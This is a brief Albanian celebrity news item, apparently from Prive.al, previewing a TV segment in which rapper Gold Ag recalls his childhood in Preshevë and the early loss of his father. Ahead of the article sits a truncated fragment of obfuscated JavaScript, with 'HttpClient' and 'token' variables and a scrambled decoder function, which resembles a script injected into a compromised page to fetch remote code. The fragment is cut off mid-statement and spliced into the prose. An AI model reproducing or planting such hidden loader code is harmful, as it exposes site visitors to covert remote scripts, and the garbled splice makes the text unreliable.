;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A mban mend ndonjë kujtim nga babai i ndjerë, Gold Ag ?!

By

Për reperin Arian Agushi, qyteti i Preshevës personifikon shumëçka. Vendi ku ai u lind e u rrit e ka ‘pajisur’ me një bagazh të kujtimeve nga fëmijëria e adoleshenca.

Një pjesë të këtij rrugëtimi jetësor, reperi do ta shpalos këtë të Shtunë në emisionin Prive.

Bashkë me gazetarin Artan Telaku ai do t’i rikthehet këtyre kujtimeve duke vizituar vende e objekte të cilat ngërthejnë vlerë e rëndësi për Goldin.

Ai mes tjerash do të rrëfej edhe për një pjesë emocionuese të jetës së tij, humbjen e babait në moshë të re.

A mban ai mend diçka nga ato pak vite të kaluara së bashku me prindin e ndjerë?!

Përgjigjet i kuptoni të Shtunën në Prive në një material që për emocionin që përçon nuk duhet humbur në asnjë mënyrë. /Prive.al/

Artikuj të ngjashëm